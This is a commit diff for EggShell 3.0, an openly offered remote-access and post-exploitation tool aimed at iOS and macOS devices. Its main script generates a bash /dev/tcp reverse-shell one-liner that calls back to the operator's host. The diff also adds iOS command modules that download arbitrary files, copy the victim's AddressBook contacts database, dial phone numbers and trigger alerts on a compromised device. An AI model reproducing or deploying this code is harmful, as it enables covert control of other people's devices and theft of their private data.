3rd revision

- ssl socket encryption - reorganized codebase - tab completion - comes with first linux python payload (lacking multiserver/new payload types)
lucasjacks0n · Dec 21, 2017 · d753b99 · d753b99
1 parent dd9f71e
commit d753b99
Show file tree

Hide file tree

Showing 192 changed files with 4,335 additions and 4,735 deletions.
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,5 @@
+*.pyc
+src/espro/.theos
+src/esplios/.theos
+.keys
+downloads
diff --git a/build_ios.sh b/build_ios.sh
@@ -0,0 +1,9 @@
+cd src/esplios
+rm -rf packages
+echo "cleaning..."
+make clean
+echo "building..."
+make package
+dpkg -x packages/* new
+echo "updating binary"
+mv new/usr/bin/esplios ../../resources/esplios
diff --git a/build_macos.sh b/build_macos.sh
@@ -0,0 +1,7 @@
+cd src/esplmacos
+rm mv build/Release/esplmacos
+xcodebuild -target esplmacos -configuration Release
+echo updating binary...
+rm ../../resources/esplmacos
+echo "updating binary"
+mv build/Release/esplmacos ../../resources/esplmacos
diff --git a/build_pro.sh b/build_pro.sh
@@ -0,0 +1,10 @@
+cd src/espro
+rm -rf packages
+echo "cleaning..."
+make clean
+echo "building..."
+make package
+dpkg -x packages/* new
+echo "updating binary"
+mv new/Library/MobileSubstrate/DynamicLibraries/* ../../resources/
+rm -rf new
diff --git a/eggshell.py b/eggshell.py
@@ -1,130 +1,118 @@
 #!/usr/bin/python
-#EggShell
-#Created By lucas.py 8-18-16
-#TODO: Gain root, and fix for any system() call locally
-debug = 0
-
-import base64
-import binascii
-import os
-import random
-import string
-import sys
-import time
-from StringIO import StringIO
-from threading import Thread
-sys.dont_write_bytecode = True
-from modules.encryption.ESEncryptor import ESEncryptor
-from modules.server.server import ESServer
-from modules.helper.helper import Helper
-#MARK: Globals
-h = Helper()
-shellKey = ''.join((random.choice(string.letters+string.digits)) for x in range(32))
-server = ESServer(ESEncryptor(shellKey,16),h)
-
-BANNER_ART_TEXT = h.GREEN+"""
+from modules import server as srv
+from modules import helper as h
+server = srv.Server()
+
+#banner
+banner_text = h.GREEN+"""
 .---.          .-. .        . .       \\      `.
 |             (   )|        | |     o  \\       `.
 |--- .-.. .-.. `-. |--. .-. | |         \\        `.
 |   (   |(   |(   )|  |(.-' | |     o    \\      .`
 '---'`-`| `-`| `-' '  `-`--'`-`-          \\   .`
-     ._.' ._.'                               `          """+h.RED+"""
- _._._._._._._._._._|"""+h.COLOR_INFO+"______________________________________________."+h.RED+"""
-|_#_#_#_#_#_#_#_#_#_|"""+h.COLOR_INFO+"_____________________________________________/"+h.RED+"""
-                    l
-"""+h.WHITE+"\nVersion: 2.2.2\nCreated By Lucas Jackson (@neoneggplant)\n"+h.ENDC
-BANNER_MENU_TEXT = h.WHITE+"-"*40+"\n"+""" Menu:
+     ._.' ._.'                               `"""+h.COLOR_INFO+"""
+                    ,_  .--.
+               , ,   _)\\/    ;--.
+       . ' .    \\_\\-'   |  .'    \\
+      -= * =-   (.-,   /  /       |
+       ' .\\'    ).  ))/ .'   _/\\ /
+           \\_   \\_  /( /     \\ /(
+           /_\\ .--'   `-.    //  \\
+           ||\\/        , '._//    |
+           ||/ /`(_ (_,;`-._/     /
+           \\_.'   )   /`\\       .'
+                .' .  |  ;.   /`
+               /      |\\(  `.(
+              |   |/  | `    `
+              |   |  /
+              |   |.'
+           __/'  /
+       _ .'  _.-`
+    _.` `.-;`/
+   /_.-'` / /
+         | /
+        ( /
+       /_/
+"""+h.WHITE+"\nVersion: 3.0\nCreated By Lucas Jackson (@neoneggplant)\n"+h.ENDC +\
+h.WHITE+"-"*40+"\n"+""" Menu:
     1): Start Server
     2): Start Multi Server
     3): Create Payload
     4): Exit
-"""+h.WHITE+"-"*40
-BANNER = BANNER_ART_TEXT+""+BANNER_MENU_TEXT+"\n"+h.NES
-ONMENU = 1
-def menu():
-    global ONMENU
-    while 1:
-        ONMENU = 1
-        os.system(h.CMD_CLEAR)
-        option = raw_input(BANNER)
-        choose = {
-            "1" : menuStartServer,
-            "2" : menuStartMultiServer,
-            "3" : menuCreateScript,
-            "4" : menuExit
-        }
-        try:
-            ONMENU = 0
-            choose[option]()
-            os.system(h.CMD_CLEAR)
-        except KeyError:
-            ONMENU = 1
-            continue
-
-def promptHostPort():
-    lhost = server.getip()
-    lport = None
-    hostChoice = raw_input("SET LHOST (Leave blank for "+lhost+")>")
-    if hostChoice != "":
-        lhost = hostChoice
-    h.strinfo("LHOST = " + lhost)
-    #validate int
-    while 1:
-        try:
-            lport = raw_input("SET LPORT (Leave blank for 4444)>")
-            if not lport:
-                lport = 4444
-            lport = int(lport)
-            if lport < 1024:
-                h.strinfo("invalid port, please enter a value >= 1024")
-                continue
-            break
-        except KeyboardInterrupt:
-            return
-        except:
-            h.strinfo("invalid port, please enter a valid integer")
-
-    h.strinfo("LPORT = " + str(lport))
-    return [lhost,lport]
-
-def promptServerRun(host,port):
+"""+h.WHITE+"-"*40 + "\n"+h.NES
+
+#How
+help_text = h.RED+"""     |                            """+h.GREEN+"""             |
+"""+h.RED+"""  ___|___                         """+h.GREEN+"""          ___|___
+"""+h.RED+""" ////////\   _                    """+h.GREEN+"""     _   /\\\\\\\\\\\\\\\\
+"""+h.RED+"""////////  \ ('<                   """+h.GREEN+"""    >') /  \\\\\\\\\\\\\\\\
+"""+h.RED+"""| (_)  |  | (^)                   """+h.GREEN+"""    (^) |  | (_)  |
+"""+h.RED+"""|______|.===="==                  """+h.GREEN+"""   =="====.|______|
+
+"""+h.RED+"    SERVER                                  "+h.GREEN+"CLIENT"+h.WHITE+"""
+                                     ->(EXPLOITATION?)
+(Detect Device) """+h.COLOR_INFO+"<<<-------------------"+h.WHITE+""" (Shell Script)
+(Send Binary)   """+h.COLOR_INFO+"------------------->>>"+h.WHITE+""" (execute binary)
+(Command Shell) """+h.COLOR_INFO+"<<<-------SSL------>>>"+h.WHITE+""" (Run Commands)"""
+
+# Actions
+
+def start_server():
+	if not server.set_host_port():
+		return
+	server.single()
+
+
+def start_multi_server():
+	print "start multi server"
+
+
+def prompt_run_server():
     if raw_input(h.NES+"Start Server? (Y/n): ") == "n":
         return
     else:
         if raw_input(h.NES+"Multi Server? (y/N): ") == "y":
             server.multiServer(host,port)
         else:
-            server.singleServer(host,port)
+            server.single()
 
-#MARK: Menu Functions
 
-def menuStartServer(): #1
-    sp = promptHostPort()
-    if not sp:
-        return
-    server.singleServer(sp[0],sp[1])
-
-def menuStartMultiServer(): #2
-    sp = promptHostPort()
-    server.multiServer(sp[0],sp[1]);
-    menu()
-
-def menuCreateScript(): #3
-    sp = promptHostPort()
-    print h.COLOR_INFO+"bash &> /dev/tcp/"+sp[0]+"/"+str(sp[1])+" 0>&1"+h.ENDC
-    promptServerRun(sp[0],sp[1])
-
-def menuExit(): #4
-    exit()
-
-def main():
-    global ONMENU
-    while 1:
-        try:
-            menu()
-        except KeyboardInterrupt:
-            if ONMENU == 1:
-                print ""
-                exit()
-
-main()
+def create_payload():
+	if not server.set_host_port():
+		return
+	print h.COLOR_INFO+"bash &> /dev/tcp/"+server.host+"/"+str(server.port)+" 0>&1"+h.ENDC
+	prompt_run_server()
+
+
+def exit_menu():
+	exit()
+
+
+def menu(err=""):
+    h.clear()
+    if err:
+    	print err
+    option = raw_input(banner_text)
+    choose = {
+        "1" : start_server,
+        "2" : start_multi_server,
+        "3" : create_payload,
+        "4" : exit_menu
+    }
+    try:
+        choose[option]()
+        menu()
+    except KeyError:
+      if option:
+      	menu("Oops: " + option + " is not an option")
+      else:
+        menu()
+
+
+if __name__ == "__main__":
+	try:
+		h.generate_keys()
+		menu()
+	except KeyboardInterrupt:
+		print "\nBye!"
+		exit()
diff --git a/modules/__init__.py b/modules/__init__.py
@@ -1,2 +0,0 @@
-import sys
-sys.dont_write_bytecode

diff --git a/modules/encryption/__init__.py → modules/commands/__init__.py b/modules/encryption/__init__.py → modules/commands/__init__.py
diff --git a/modules/commands/iOS/alert_ios.py b/modules/commands/iOS/alert_ios.py
@@ -0,0 +1,14 @@
+import base64
+import json
+
+class command:
+    def __init__(self):
+        self.name = "alert"
+        self.description = "make alert show up on device"
+        self.type = "native"
+
+    def run(self,session,cmd_data):
+        title = raw_input("title: ")
+        message = raw_input("message: ")
+        session.send_command({"cmd":"alert","args":json.dumps({"title":title,"message":message})})
+        return ""
diff --git a/modules/commands/iOS/battery_ios.py b/modules/commands/iOS/battery_ios.py
@@ -0,0 +1,7 @@
+class command:
+    def __init__(self):
+        self.name = "battery"
+        self.description = "get battery level"
+
+    def run(self,session,cmd_data):
+        print session.send_command(cmd_data)
diff --git a/modules/commands/iOS/bundleids_ios.py b/modules/commands/iOS/bundleids_ios.py
@@ -0,0 +1,7 @@
+class command:
+    def __init__(self):
+        self.name = "bundleids"
+        self.description = "list bundle identifiers"
+
+    def run(self,session,cmd_data):
+        print session.send_command(cmd_data).rstrip()
diff --git a/modules/commands/iOS/cd_ios.py b/modules/commands/iOS/cd_ios.py
@@ -0,0 +1,9 @@
+class command:
+    def __init__(self):
+        self.name = "cd"
+        self.description = "change directory"
+
+    def run(self,session,cmd_data):
+        error = session.send_command(cmd_data)
+        if error:
+        	print error
diff --git a/modules/commands/iOS/dhome_ios.py b/modules/commands/iOS/dhome_ios.py
@@ -0,0 +1,10 @@
+class command:
+    def __init__(self):
+        self.name = "dhome"
+        self.description = "simulate a double home button press"
+
+    def run(self,session,cmd_data):
+    	cmd_data["cmd"] = "doublehome"
+        error = session.send_command(cmd_data)
+        if error:
+        	print error
diff --git a/modules/commands/iOS/dial_ios.py b/modules/commands/iOS/dial_ios.py
@@ -0,0 +1,12 @@
+class command:
+    def __init__(self):
+        self.name = "dial"
+        self.description = "dial a phone number"
+        self.usage = "Usage: dial 1234567890"
+
+    def run(self,session,cmd_data):
+    	if not cmd_data['args']:
+    		print self.usage
+    		return
+    	cmd_data.update({"cmd":"openurl","args":"tel://"+cmd_data['args']})
+        session.send_command(cmd_data)
diff --git a/modules/commands/iOS/download_ios.py b/modules/commands/iOS/download_ios.py
@@ -0,0 +1,25 @@
+import json
+import os
+import modules.helper as h
+
+class command:
+	def __init__(self):
+		self.name = "download"
+		self.description = "download file"
+		self.usage = "Usage: download file"
+		self.type = "native"
+
+	def run(self,session,cmd_data):
+		if not cmd_data['args']:
+			print self.usage
+			return
+		file_name = os.path.split(cmd_data['args'])[-1]
+		h.info_general("Downloading {0}".format(file_name))
+		data = session.download_file(cmd_data['args'])
+		if data:
+			# save to downloads
+			h.info_general("Saving {0}".format(file_name))
+			f = open(os.path.join('downloads',file_name),'w')
+			f.write(data)
+			f.close()
+			h.info_general("Saved to ./downloads/{0}".format(file_name))
diff --git a/modules/commands/iOS/getcontacts_ios.py b/modules/commands/iOS/getcontacts_ios.py
@@ -0,0 +1,20 @@
+import json
+import os
+import modules.helper as h
+
+class command:
+	def __init__(self):
+		self.name = "getcontacts"
+		self.description = "download addressbook"
+
+	def run(self,session,cmd_data):
+		file_name = "AddressBook.sqlitedb"
+		h.info_general("Downloading {0}".format(file_name))
+		data = session.download_file('/var/mobile/Library/AddressBook/'+file_name)
+		if data:
+			# save to downloads
+			h.info_general("Saving {0}".format(file_name))
+			f = open(os.path.join('downloads',file_name),'w')
+			f.write(data)
+			f.close()
+			h.info_general("Saved to ./downloads/{0}".format(file_name))